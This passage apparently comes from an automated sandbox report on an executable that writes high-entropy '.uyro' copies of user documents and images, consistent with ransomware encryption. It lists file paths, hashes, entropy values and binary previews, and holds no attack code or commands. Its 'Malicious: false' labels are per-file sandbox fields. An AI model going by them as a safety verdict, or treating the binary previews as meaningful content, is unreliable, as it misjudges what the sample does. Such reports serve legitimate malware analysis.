SHA-512:	52D3002235DD45D099D8E2EB92FEC61BE53B1938E7A826C206B0BAF6423D0D7C557AF140B12A3A4C66F57CCD3A68E0C937EFD69391EC52019473DBF673242E32
Malicious:	false
Reputation:	unknown
Preview:	FENIV`M...U.3...c.N......)4........L..>.3..e:0..Cj..i....L!.......9;O..j\.KW......4.V...%../.....5.....vI>. .v...-..Sx5=.E.s.&.'.gYo{.......^..[5.2...f.....R.ft.+.n...}....x...D.{t,.[/.........B.g.....0...(..:S..#zq9.:.L....JB... ...No.z.z@....x.......`>.4Gxh.)....~fbr.@B.9..].6%.m.%C.7.9..U"^..P....6..Y...d.W.........9.i.....x......@!......!.....}-.C.bT{b.PEN.......p5.<r~1.>".F...n.../q...`....d......h.gK......}^.?.,..;.z.Q.\|."A.f\|...k[...X..T..$B..4i65..Y..'e....S.mi.+...0./....k.....R.1...!+.......P.. .t...0..7..${d....\|.y..2dRL....U......W.{J..C....o..3.dx..E2.n.....$}..R.....o.d..)..e..e...<...t.1$=...8`....m..6..._,.=@.n-..m...%..V..\|..\|...N......t.....!-.).....v5...rh........C........<.T.;..1.1X.`.......I7R^...G...u.._..-..g.>..w-..Yh...F.B3^.'..W..z:v.. ...aj..p4.......^:....b.A-H<6.ZQoo..w....!...d/rYy.#....A..e.......g.$R....Z.....c..2....\.E....{v.`3"......<.J.h.4.ik......Y....j\|r7WI}.9..wl$..M..t$...-..W..If..C.I..+.

C:\Users\user\Downloads\FENIVHOIKN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855127939360492
Encrypted:	false
SSDEEP:	24:KgrPlJuuxggrl+SvhaAwq1qsW1bqbF1mmMHWD3mqpepSJsxbbo/CmrEJVIwSzZhq:KcPxxgil+AfycF1mmMQdySJgvo/Z4kt0
MD5:	EB0ADD5031347B93D2A8C737F289ACD5
SHA1:	B0EFCBB28C631AFBE85D8236F22A47C45E439116
SHA-256:	29A1AE22AA4FD441DB91F7E2457D5C2210DC257DFBA5D8173326AA2E6A31AA62
SHA-512:	52D3002235DD45D099D8E2EB92FEC61BE53B1938E7A826C206B0BAF6423D0D7C557AF140B12A3A4C66F57CCD3A68E0C937EFD69391EC52019473DBF673242E32
Malicious:	false
Reputation:	unknown
Preview:	FENIV`M...U.3...c.N......)4........L..>.3..e:0..Cj..i....L!.......9;O..j\.KW......4.V...%../.....5.....vI>. .v...-..Sx5=.E.s.&.'.gYo{.......^..[5.2...f.....R.ft.+.n...}....x...D.{t,.[/.........B.g.....0...(..:S..#zq9.:.L....JB... ...No.z.z@....x.......`>.4Gxh.)....~fbr.@B.9..].6%.m.%C.7.9..U"^..P....6..Y...d.W.........9.i.....x......@!......!.....}-.C.bT{b.PEN.......p5.<r~1.>".F...n.../q...`....d......h.gK......}^.?.,..;.z.Q.\|."A.f\|...k[...X..T..$B..4i65..Y..'e....S.mi.+...0./....k.....R.1...!+.......P.. .t...0..7..${d....\|.y..2dRL....U......W.{J..C....o..3.dx..E2.n.....$}..R.....o.d..)..e..e...<...t.1$=...8`....m..6..._,.=@.n-..m...%..V..\|..\|...N......t.....!-.).....v5...rh........C........<.T.;..1.1X.`.......I7R^...G...u.._..-..g.>..w-..Yh...F.B3^.'..W..z:v.. ...aj..p4.......^:....b.A-H<6.ZQoo..w....!...d/rYy.#....A..e.......g.$R....Z.....c..2....\.E....{v.`3"......<.J.h.4.ik......Y....j\|r7WI}.9..wl$..M..t$...-..W..If..C.I..+.

C:\Users\user\Downloads\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846290204373446
Encrypted:	false
SSDEEP:	24:96DazkwTC+2RU890XwAlots338upAi32pVqpfwjTpcWcuvhCK/R//fC/W/JkbD:sWHI39UwAlH8hi3r6TJtC2quuD
MD5:	3B38AFD1E1B82CA2993E3B47EF6DD444
SHA1:	6267A0C2A45B0E74F34239D83FF2195969F823EA
SHA-256:	AC6DBCEA6E664462691EA582169E66AB0E606738E96AD580261A67931FB2A4E9
SHA-512:	DDF5C8443E73B735C08A9E9B122CD3733FAA449444BA07E50EF4BF4765BCAF0719534449906964386A89D557DCB54C426E51D8828217E02D7E061EF3D09591EB
Malicious:	false
Reputation:	unknown
Preview:	JSDNGZ..\....3.}db"KE..0_..V..Ik....T..t...=)=Z..../(...........L%V.u...fp.F...:.....wvx.......}m\|.I....].z..._z...P.N.B..B..........].m..n.N....b........eu....A1...^....u...Qdv:.=.v.f.S3. .4.....PX....NA..F...be.3!.I.A.lm..N-...s.y[......U....H....<.]6.;...C8..ZS..-x.EK.F.....".!..~LYGT&f.^..!..E4..&.......8[~.6.......w.r.xt.j..G.[.JT.Uh.......C2].C.s]..z.....y.3%..Oa.&vB&..~..s....i.2?.G.k..NI...f..;.e....d,Q......J.a...=.j..u.9...f..../.,...N+.H......A. .t.....Mg.%..W.#.....F.'.[..X......TA..Z...k....Ic..RY`.s...k.8l.).$z3...C.#}tI5.f^tkC:p.J1iq...X.......o@j.........j...o.....rm....(...+.r~I.....z4;....E7......j/...G$.s.oU..,.+v.{UgM.%T.`..&^..JIL_...."...4..6....j.Qj....U.a.+sA'd/..3..K..8~..:.0.68....J?l...C...%.@.:rv...h...DQ.gf..Y..f3D....$";M...DG...u...Z.....\|..v.+../]. ........T...cB...%...R....T...\.:m^x.8/Y.;.......)0~..V....;.f..}....F..y.H....t6........%...yC7..8{.v..[...G...8.G= .;b..6....j.\..3DlXO...

C:\Users\user\Downloads\JSDNGYCOWY.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846290204373446
Encrypted:	false
SSDEEP:	24:96DazkwTC+2RU890XwAlots338upAi32pVqpfwjTpcWcuvhCK/R//fC/W/JkbD:sWHI39UwAlH8hi3r6TJtC2quuD
MD5:	3B38AFD1E1B82CA2993E3B47EF6DD444
SHA1:	6267A0C2A45B0E74F34239D83FF2195969F823EA
SHA-256:	AC6DBCEA6E664462691EA582169E66AB0E606738E96AD580261A67931FB2A4E9
SHA-512:	DDF5C8443E73B735C08A9E9B122CD3733FAA449444BA07E50EF4BF4765BCAF0719534449906964386A89D557DCB54C426E51D8828217E02D7E061EF3D09591EB
Malicious:	false
Reputation:	unknown
Preview:	JSDNGZ..\....3.}db"KE..0_..V..Ik....T..t...=)=Z..../(...........L%V.u...fp.F...:.....wvx.......}m\|.I....].z..._z...P.N.B..B..........].m..n.N....b........eu....A1...^....u...Qdv:.=.v.f.S3. .4.....PX....NA..F...be.3!.I.A.lm..N-...s.y[......U....H....<.]6.;...C8..ZS..-x.EK.F.....".!..~LYGT&f.^..!..E4..&.......8[~.6.......w.r.xt.j..G.[.JT.Uh.......C2].C.s]..z.....y.3%..Oa.&vB&..~..s....i.2?.G.k..NI...f..;.e....d,Q......J.a...=.j..u.9...f..../.,...N+.H......A. .t.....Mg.%..W.#.....F.'.[..X......TA..Z...k....Ic..RY`.s...k.8l.).$z3...C.#}tI5.f^tkC:p.J1iq...X.......o@j.........j...o.....rm....(...+.r~I.....z4;....E7......j/...G$.s.oU..,.+v.{UgM.%T.`..&^..JIL_...."...4..6....j.Qj....U.a.+sA'd/..3..K..8~..:.0.68....J?l...C...%.@.:rv...h...DQ.gf..Y..f3D....$";M...DG...u...Z.....\|..v.+../]. ........T...cB...%...R....T...\.:m^x.8/Y.;.......)0~..V....;.f..}....F..y.H....t6........%...yC7..8{.v..[...G...8.G= .;b..6....j.\..3DlXO...

C:\Users\user\Downloads\KZWFNRXYKI.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848842639597147
Encrypted:	false
SSDEEP:	24:jXxfl2+6zPc3804pOIFIM+nMWHvOmXjGX0LDxB1loaFvz8IYPrsm5u3oNXSLVZqh:Vl2WsWLvfGXC1jloaFvz8IYPQmIoaToD
MD5:	7B641C6362CDAF945800D4CE58C903F4
SHA1:	72D7B582E6E77EA14DD61FBBC66C8140788BC285
SHA-256:	413D9AEB8CACC7DEC19F0EAF807C7E452FFBD4EC031C6C4D0A8F932B33A955F6
SHA-512:	A1D6FC447C22790C90D00660539C60E37C048CABFFAAEC6190956064B14445742BD19B906755E02FFAC8E4668F34DC7453160FFD72A559C3E3DFC96C64C1BBDC
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.A..c.r.bQ'.E..x........Be.abO.x.y8.(..F.-.....:.LT.sqa..`s...+./N..T..mUjc\.....s.k.."c...9...%.$wQ.Z.sxv..UB..."o.?...).w.M.0....h..9.J.I..}.p\rnM...0o!....t.$.....[..!b..0x.{.&.0.3..t.j....{ZA.?[.c?V.I.VCULJ...4.m.Ez...........5I-.L.......3....`.`.T$X.x.a..A..X..7. ..TZ.(....'...YO%.T...n..%...m&...mF5.J.....$......1J...r. .7...y.6...#{T^..Q.!......"Ys..`.I....u..f...-^C...j.-W&.....;.,-8']..WL.]A..h....O.Yy.Sg...=(.n...4uX..ji+....GI....b.6A)......+.......{.....u&..DN..{8vG.`./.=by<oM......x.i..^......Z;.>.I..W..h..Ih..'..~c.......ys.... ....Fd.(..H....e.t.Ff...A.m8.....;..+......{....EF....a.1..qa....e8..(n6@.In..8,$\|..WO..'qE.4.20....[.F.@...=.V...M.-j.wv.P.D.......H....#.._.N. K..1.{..*...y..H.z'8p8.m6...2.\|V...&5_8..i.T.....II.T........H..}...s....uE..fCo..0.mG.#...Q...x.p....3..\|<....X.o..c..M.c..Z$.>..P+h0..@G.D.......+q(.6....m..l ..U..P.p.im%#.g...N_nX..t.RL<.=^t$0c..b.:.5.$"QE..Vt.V.........S.....T G.......1...%..K

C:\Users\user\Downloads\KZWFNRXYKI.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848842639597147
Encrypted:	false
SSDEEP:	24:jXxfl2+6zPc3804pOIFIM+nMWHvOmXjGX0LDxB1loaFvz8IYPrsm5u3oNXSLVZqh:Vl2WsWLvfGXC1jloaFvz8IYPQmIoaToD
MD5:	7B641C6362CDAF945800D4CE58C903F4
SHA1:	72D7B582E6E77EA14DD61FBBC66C8140788BC285
SHA-256:	413D9AEB8CACC7DEC19F0EAF807C7E452FFBD4EC031C6C4D0A8F932B33A955F6
SHA-512:	A1D6FC447C22790C90D00660539C60E37C048CABFFAAEC6190956064B14445742BD19B906755E02FFAC8E4668F34DC7453160FFD72A559C3E3DFC96C64C1BBDC
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.A..c.r.bQ'.E..x........Be.abO.x.y8.(..F.-.....:.LT.sqa..`s...+./N..T..mUjc\.....s.k.."c...9...%.$wQ.Z.sxv..UB..."o.?...).w.M.0....h..9.J.I..}.p\rnM...0o!....t.$.....[..!b..0x.{.&.0.3..t.j....{ZA.?[.c?V.I.VCULJ...4.m.Ez...........5I-.L.......3....`.`.T$X.x.a..A..X..7. ..TZ.(....'...YO%.T...n..%...m&...mF5.J.....$......1J...r. .7...y.6...#{T^..Q.!......"Ys..`.I....u..f...-^C...j.-W&.....;.,-8']..WL.]A..h....O.Yy.Sg...=(.n...4uX..ji+....GI....b.6A)......+.......{.....u&..DN..{8vG.`./.=by<oM......x.i..^......Z;.>.I..W..h..Ih..'..~c.......ys.... ....Fd.(..H....e.t.Ff...A.m8.....;..+......{....EF....a.1..qa....e8..(n6@.In..8,$\|..WO..'qE.4.20....[.F.@...=.V...M.-j.wv.P.D.......H....#.._.N. K..1.{..*...y..H.z'8p8.m6...2.\|V...&5_8..i.T.....II.T........H..}...s....uE..fCo..0.mG.#...Q...x.p....3..\|<....X.o..c..M.c..Z$.>..P+h0..@G.D.......+q(.6....m..l ..U..P.p.im%#.g...N_nX..t.RL<.=^t$0c..b.:.5.$"QE..Vt.V.........S.....T G.......1...%..K

C:\Users\user\Downloads\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832825866940061
Encrypted:	false
SSDEEP:	24:HfbWqhhp1LqpQJZhhQODu03FQ6oM+EAtY3X0ksloNZFGykCbD:zWwL1JXN9FQlDqn0bloNeDQD
MD5:	26068CD7A7EB7A169A73D5BC187FE5CA
SHA1:	2ED37FADF56C4B63BEADED3E4D685FE11E4549DC
SHA-256:	C81E30E9A72D7359457F3F1C29EDC9A7655F6010D6D678FE445703E901D3091C
SHA-512:	514B30B6D0CB6890297216120A08ED511A17B25EB60F74D3E71BCB8FB324BB629775741479EB8F89A919E219DC821BE44371F2DF3EF02C723E12EA0AAADE7E3A
Malicious:	false
Reputation:	unknown
Preview:	KZWFN..K..................1c]N.\.r.E.B..e..Rqg...'t[..z.&S..G..Z+..q.A.8....aK..;.T.y.......X...r...$...j}\|.ty.sV...L.....(.)S_q..f?..NFC\,..0."`Q%O&.a.<U.k.Ap/..3.4....Q.%9....B..')3._.[\|...@.... MP...,[...\|..hK.9BF..$].-..C.}'...:6.6;B..]?.w...6t..T.....D.....94...5....[mP....h.\..E...fy.....[..a.9."... ..;.hc.r.H........F..imE..h..=.GH..K.I....I .V..p.....&..t...+.....E.x..h>..N.a...;>...DDH....}.f.?..U._t.F..wP..}.o2....0..F.K.5......@e..e.F....:y..K;V.C..u...x..\|H...........N....\.].C.:.X....4~h..0......q..7...:,........?w.....`.r.....KG...&..'........y(..y-.. .B....:.r-.H.m.....v.I..;.h$j..+.Kr[K...+.o.~...4 ./.9.E.C=..M...]/.-.`..v..?7..@P.\|....4.k..X.y..e.m;.......,."Y..U..9....3.?U.1..y.~Hn3(..f.....a.cf....S.....@..c..2J]b,...lq].xI..]._.....xHE2.e.IT.C.mO;.....]~e......}H...h..ao.=.e6..._.....}.rx...Y.b.....?1..".......d...J2`N.N=..O..B...r....R...6.........].uM..%..I2...t.1...(..1.4V.....%..S.C6...YigY../.'.....VK.<c

C:\Users\user\Downloads\KZWFNRXYKI.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832825866940061
Encrypted:	false
SSDEEP:	24:HfbWqhhp1LqpQJZhhQODu03FQ6oM+EAtY3X0ksloNZFGykCbD:zWwL1JXN9FQlDqn0bloNeDQD
MD5:	26068CD7A7EB7A169A73D5BC187FE5CA
SHA1:	2ED37FADF56C4B63BEADED3E4D685FE11E4549DC
SHA-256:	C81E30E9A72D7359457F3F1C29EDC9A7655F6010D6D678FE445703E901D3091C
SHA-512:	514B30B6D0CB6890297216120A08ED511A17B25EB60F74D3E71BCB8FB324BB629775741479EB8F89A919E219DC821BE44371F2DF3EF02C723E12EA0AAADE7E3A
Malicious:	false
Reputation:	unknown
Preview:	KZWFN..K..................1c]N.\.r.E.B..e..Rqg...'t[..z.&S..G..Z+..q.A.8....aK..;.T.y.......X...r...$...j}\|.ty.sV...L.....(.)S_q..f?..NFC\,..0."`Q%O&.a.<U.k.Ap/..3.4....Q.%9....B..')3._.[\|...@.... MP...,[...\|..hK.9BF..$].-..C.}'...:6.6;B..]?.w...6t..T.....D.....94...5....[mP....h.\..E...fy.....[..a.9."... ..;.hc.r.H........F..imE..h..=.GH..K.I....I .V..p.....&..t...+.....E.x..h>..N.a...;>...DDH....}.f.?..U._t.F..wP..}.o2....0..F.K.5......@e..e.F....:y..K;V.C..u...x..\|H...........N....\.].C.:.X....4~h..0......q..7...:,........?w.....`.r.....KG...&..'........y(..y-.. .B....:.r-.H.m.....v.I..;.h$j..+.Kr[K...+.o.~...4 ./.9.E.C=..M...]/.-.`..v..?7..@P.\|....4.k..X.y..e.m;.......,."Y..U..9....3.?U.1..y.~Hn3(..f.....a.cf....S.....@..c..2J]b,...lq].xI..]._.....xHE2.e.IT.C.mO;.....]~e......}H...h..ao.=.e6..._.....}.rx...Y.b.....?1..".......d...J2`N.N=..O..B...r....R...6.........].uM..%..I2...t.1...(..1.4V.....%..S.C6...YigY../.'.....VK.<c

C:\Users\user\Downloads\KZWFNRXYKI.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8512829480981265
Encrypted:	false
SSDEEP:	24:CFwaYIqATLmhc6WV4mPVIPcB5yCOKwFwMdeK0iWs85krVVadJeS3dZrbD:CFw6JTB6ZmPVOcPyCODFlwp86dJeSNtD
MD5:	527979F87997B99D456FDE83AB718B4B
SHA1:	27750F381839E287D24236F8D060CE4177A174D2
SHA-256:	6F36D2F156E289B292690F4FB5A5A5D7E0A7B49D174859A1A10B806CCC1615BF
SHA-512:	41B670828EAFF7C46612FFAB22297F54D20D369C4F8E38A88F2EF9A06B346A6BDC995DE7D981338EC0A2512D7B5C4DC92D6513C79DB97563D4C7A4028BA4692C
Malicious:	false
Reputation:	unknown
Preview:	KZWFN+.^.Yh.".u...e.3....e)...#2y..r.w.....8.:..F+...r..?.$]E.j..G.....~O\|Y......@.....T..O}....`...q.m..R.....?..o./Q$....cm%..aX.6.......%.k..E..$..j..2.......d..Y..{....t......../...<...ZZ.....7...a.RAy.....#.UfAu...w.....e..6G..>.)!..BQ...D...f..b.?...w..?....E...j.Y....).T@..8"C.A....YB9..x.bC<tM^...6t]._nD...........=....=>.8...4^.cIWc.^..=.k."n....u..!.Eb\|..L.}....1....-^M.;....].P.yi6.s.ga...d.T.TJ..>4.z=o>.r.0}.!.}.>.iU}.;.e.r....Zx.%7....ts`k...b...M.<...':....Q.`)..i..3.H..l.7l.gY.+a.3>./...V.j~.~m..t.......{9...........=.[.,.x.q`&ckz...Q..!..2.}.@.L.$..[.3.stB...#A...f.5?.......7..1E.....Ga+..?w..\|8....lS....sO\FM...]C.o.....Z..Y.6.p.J....+.U.X.........q.h.\|1..m....lQe..t..2/^S..(.DZK}.% .u.M.1...G....f.B.....S..ON.Q.3....&b4..s.~.d..8aj,..........~.......c/..C....O...;..o..g?.m.z.....T@.G....GDsR..b..nnK> ..9..t.-.'E..q.......L>..Q.#....9.u.x.\|9........._...C.:....E..<}Y....x...h...T.D5y..a~D,...^...bzO.....}

C:\Users\user\Downloads\KZWFNRXYKI.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8512829480981265
Encrypted:	false
SSDEEP:	24:CFwaYIqATLmhc6WV4mPVIPcB5yCOKwFwMdeK0iWs85krVVadJeS3dZrbD:CFw6JTB6ZmPVOcPyCODFlwp86dJeSNtD
MD5:	527979F87997B99D456FDE83AB718B4B
SHA1:	27750F381839E287D24236F8D060CE4177A174D2
SHA-256:	6F36D2F156E289B292690F4FB5A5A5D7E0A7B49D174859A1A10B806CCC1615BF
SHA-512:	41B670828EAFF7C46612FFAB22297F54D20D369C4F8E38A88F2EF9A06B346A6BDC995DE7D981338EC0A2512D7B5C4DC92D6513C79DB97563D4C7A4028BA4692C
Malicious:	false
Reputation:	unknown
Preview:	KZWFN+.^.Yh.".u...e.3....e)...#2y..r.w.....8.:..F+...r..?.$]E.j..G.....~O\|Y......@.....T..O}....`...q.m..R.....?..o./Q$....cm%..aX.6.......%.k..E..$..j..2.......d..Y..{....t......../...<...ZZ.....7...a.RAy.....#.UfAu...w.....e..6G..>.)!..BQ...D...f..b.?...w..?....E...j.Y....).T@..8"C.A....YB9..x.bC<tM^...6t]._nD...........=....=>.8...4^.cIWc.^..=.k."n....u..!.Eb\|..L.}....1....-^M.;....].P.yi6.s.ga...d.T.TJ..>4.z=o>.r.0}.!.}.>.iU}.;.e.r....Zx.%7....ts`k...b...M.<...':....Q.`)..i..3.H..l.7l.gY.+a.3>./...V.j~.~m..t.......{9...........=.[.,.x.q`&ckz...Q..!..2.}.@.L.$..[.3.stB...#A...f.5?.......7..1E.....Ga+..?w..\|8....lS....sO\FM...]C.o.....Z..Y.6.p.J....+.U.X.........q.h.\|1..m....lQe..t..2/^S..(.DZK}.% .u.M.1...G....f.B.....S..ON.Q.3....&b4..s.~.d..8aj,..........~.......c/..C....O...;..o..g?.m.z.....T@.G....GDsR..b..nnK> ..9..t.-.'E..q.......L>..Q.#....9.u.x.\|9........._...C.:....E..<}Y....x...h...T.D5y..a~D,...^...bzO.....}

C:\Users\user\Downloads\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849159424513963
Encrypted:	false
SSDEEP:	24:p3DR/gOw7eVt39ipgdJG4oFkQZUBNxgLyn12Y6/Ch/vQx6PL4bB3IYbD:lD+FqVtopsGxkQGkLynjuO5sV3ICD
MD5:	03AE70B328B7CDCE33250491A973D9BC
SHA1:	1EC4B716C2FD82AA144290FA6E829ACE9908A752
SHA-256:	4A3E67335C9E5196CF8551D45B517693972965025B2379D30FC78FDB01A4EECE
SHA-512:	42D3A23961DAB19D45F1143D0AF2B7CCD45B2506A279372F6997DEFD454971C0A5A6453D5B0212F171933DC6DE8D4209EF2BB1CDC6DF3079E4BD9D40928FE0D0
Malicious:	false
Reputation:	unknown
Preview:	LTKMY..}>..e......1D...C..m'..k.`:../....c.s...2g.5Xp..b.va./.t.X.Z-.3....XV.e.6.S...Z?fG%.9.6I.....\i..R.RYe..n\."?.\|X\...l..?7.......<C....d......&K.&..K!..y..H.ng...!.w{WiY.(W.....~...o...P..............0..Dk. ..jv\|0m...li.!..p.JD.U..h..I...2^.......GB.r...3.sUpR..?7.`......J....._....X.......].!R._......8....j..O...F.=u.L.#T..!.a.UcV.E.M....".'.QB.<...HB.$..M.$... b.i.L.}..0..#..Cu.3.....2.m...9...)........a.J6......Vu.x......J..O5f..,.....Y6.P............~.s....y...m(#..........O......D........CM.<...K.n..0..3N....x<./..q#...nz..).....R..U.. ..t...T...:.5.k.".........Wa..t..Y..........r.*M0...2..+\w.;..3g.u....b.....`<.k.}#....\.q.c.B@.sKI...R.}.{...,.Z.:h...z.ti.%1..E..A.@6d........c.$8......;kW...jk..~...t..Xl.dS...'q...^3Z@....[....Ki4......I]..1.........\|....X.......D.l..t..................+5Wi..&.x.g5.g.V....S....o..[.e..k...B.i.uS....p....X...P>..(.4...O...../M.D.;#..u...3).....u.B`..............i../..x.L....V.Q...E.....~5

C:\Users\user\Downloads\LTKMYBSEYZ.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849159424513963
Encrypted:	false
SSDEEP:	24:p3DR/gOw7eVt39ipgdJG4oFkQZUBNxgLyn12Y6/Ch/vQx6PL4bB3IYbD:lD+FqVtopsGxkQGkLynjuO5sV3ICD
MD5:	03AE70B328B7CDCE33250491A973D9BC
SHA1:	1EC4B716C2FD82AA144290FA6E829ACE9908A752
SHA-256:	4A3E67335C9E5196CF8551D45B517693972965025B2379D30FC78FDB01A4EECE
SHA-512:	42D3A23961DAB19D45F1143D0AF2B7CCD45B2506A279372F6997DEFD454971C0A5A6453D5B0212F171933DC6DE8D4209EF2BB1CDC6DF3079E4BD9D40928FE0D0
Malicious:	false
Reputation:	unknown
Preview:	LTKMY..}>..e......1D...C..m'..k.`:../....c.s...2g.5Xp..b.va./.t.X.Z-.3....XV.e.6.S...Z?fG%.9.6I.....\i..R.RYe..n\."?.\|X\...l..?7.......<C....d......&K.&..K!..y..H.ng...!.w{WiY.(W.....~...o...P..............0..Dk. ..jv\|0m...li.!..p.JD.U..h..I...2^.......GB.r...3.sUpR..?7.`......J....._....X.......].!R._......8....j..O...F.=u.L.#T..!.a.UcV.E.M....".'.QB.<...HB.$..M.$... b.i.L.}..0..#..Cu.3.....2.m...9...)........a.J6......Vu.x......J..O5f..,.....Y6.P............~.s....y...m(#..........O......D........CM.<...K.n..0..3N....x<./..q#...nz..).....R..U.. ..t...T...:.5.k.".........Wa..t..Y..........r.*M0...2..+\w.;..3g.u....b.....`<.k.}#....\.q.c.B@.sKI...R.}.{...,.Z.:h...z.ti.%1..E..A.@6d........c.$8......;kW...jk..~...t..Xl.dS...'q...^3Z@....[....Ki4......I]..1.........\|....X.......D.l..t..................+5Wi..&.x.g5.g.V....S....o..[.e..k...B.i.uS....p....X...P>..(.4...O...../M.D.;#..u...3).....u.B`..............i../..x.L....V.Q...E.....~5

C:\Users\user\Downloads\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867660262453736
Encrypted:	false
SSDEEP:	24:29qWZYbEwd4a2B3FG2xvSzewW/0pZm1w592f94NagpFiflgeGTwpMg+GpnBkbD:2QWWEwd4aqTqQc5I94AGFgGTDg+0nBuD
MD5:	180C596B2EDB43A6064A296F7E60D990
SHA1:	AB0AFBF4C490108E405D6B3BFF80A1A5202DFC5B
SHA-256:	937F98A073364760B84E5625013D8DC3C6CC8D3FF4242E6E54F9D2E596F3EA20
SHA-512:	9F5E081FE23B6582D1C60D966BEA8CC796398298E24ECB47D6ED0F83DC25C98D546F11F2F6D718980ED492A050945B240907A8FB54BDA17296D3D7CBB080AFFF
Malicious:	false
Reputation:	unknown
Preview:	NEBFQY...e.(.b....t...m...J.?.q&..YI..Y...y...O7.WC..\|.#.LWiz ......4..&cN...RI2.L..Q p..w+...:Q...._.X.$-..T..s..R..Ox.._O..;K.ck.......89..+......z.?.S.t,..B..W..-..xhH....L...`~.Hr.Ak....1'.......TU.n....p22.}....d.wL...5p...}.q;8-$"..........RC.3.Oh............H...(......{........v.(...]m..1!4.7.%....9...+....!.8.z.a..=[..R....LB)....s.FfZA.....L.......A.........^...#.(.....U~<..!...n@Vh....!ib......*..:..[..&...9B.M.........X..{(.<J.gR..WT.q...^....(....C.N.C.a......d.B....g..B..1.r...\|W.aJ..A>..Z..$...u........D....S....d...{N.[....un..J.A..../lA...K..(.kS.....'.d....}?d.".4...+.... I...j..+..#.......5.w...rs..Q....F.\|...lB...,..../.F....?V.7m3s#....i.f...z~.s..R3..[lZ4..h.'..'...Y~..2.A_...E.U.[.....--K(........%D.ROr..J..L....^..T..... m.S+.....1..X`..=..j....}.....5....j..E=...9R.5.p.L.=...<...G.P.0....s#.^.........\..0.Vw...>.^NIU.[l.$......X....o.a.....m.../.Cb/.....se......$.p..A.O.g~.%..f8..=2.. N...-._.;.....H.q.Z.w%qw.

C:\Users\user\Downloads\NEBFQQYWPS.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867660262453736
Encrypted:	false
SSDEEP:	24:29qWZYbEwd4a2B3FG2xvSzewW/0pZm1w592f94NagpFiflgeGTwpMg+GpnBkbD:2QWWEwd4aqTqQc5I94AGFgGTDg+0nBuD
MD5:	180C596B2EDB43A6064A296F7E60D990
SHA1:	AB0AFBF4C490108E405D6B3BFF80A1A5202DFC5B
SHA-256:	937F98A073364760B84E5625013D8DC3C6CC8D3FF4242E6E54F9D2E596F3EA20
SHA-512:	9F5E081FE23B6582D1C60D966BEA8CC796398298E24ECB47D6ED0F83DC25C98D546F11F2F6D718980ED492A050945B240907A8FB54BDA17296D3D7CBB080AFFF
Malicious:	false
Reputation:	unknown
Preview:	NEBFQY...e.(.b....t...m...J.?.q&..YI..Y...y...O7.WC..\|.#.LWiz ......4..&cN...RI2.L..Q p..w+...:Q...._.X.$-..T..s..R..Ox.._O..;K.ck.......89..+......z.?.S.t,..B..W..-..xhH....L...`~.Hr.Ak....1'.......TU.n....p22.}....d.wL...5p...}.q;8-$"..........RC.3.Oh............H...(......{........v.(...]m..1!4.7.%....9...+....!.8.z.a..=[..R....LB)....s.FfZA.....L.......A.........^...#.(.....U~<..!...n@Vh....!ib......*..:..[..&...9B.M.........X..{(.<J.gR..WT.q...^....(....C.N.C.a......d.B....g..B..1.r...\|W.aJ..A>..Z..$...u........D....S....d...{N.[....un..J.A..../lA...K..(.kS.....'.d....}?d.".4...+.... I...j..+..#.......5.w...rs..Q....F.\|...lB...,..../.F....?V.7m3s#....i.f...z~.s..R3..[lZ4..h.'..'...Y~..2.A_...E.U.[.....--K(........%D.ROr..J..L....^..T..... m.S+.....1..X`..=..j....}.....5....j..E=...9R.5.p.L.=...<...G.P.0....s#.^.........\..0.Vw...>.^NIU.[l.$......X....o.a.....m.../.Cb/.....se......$.p..A.O.g~.%..f8..=2.. N...-._.;.....H.q.Z.w%qw.

C:\Users\user\Downloads\NWTVCDUMOB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83768745118661
Encrypted:	false
SSDEEP:	24:nxzvFUO0cIqc8EzQ3JiuaouAmWTyWcldUxWv+SY6qcQDiD3xc8huSIZ86tTbD:xScIqh3o7I52rv+7SQDiC8huS569D
MD5:	6C3238C010D76858B4CE0688F2AD0BC9
SHA1:	7A8AC065754BEFAA0C2EBC6E8552B1FFAEC3DBCF
SHA-256:	A3F4916C0E313CF40C9B2D06F995B844D3BF28C10809E2BA2663DDD1FB7AB7CE
SHA-512:	E8091155C7AAA94806D26852D0A6238B3139CF5B5F8C34DF615D058574D666977816CD1C640543A428A1FFDB160FEDE2EF8D56604989012BB881BE9E8E120A80
Malicious:	false
Reputation:	unknown
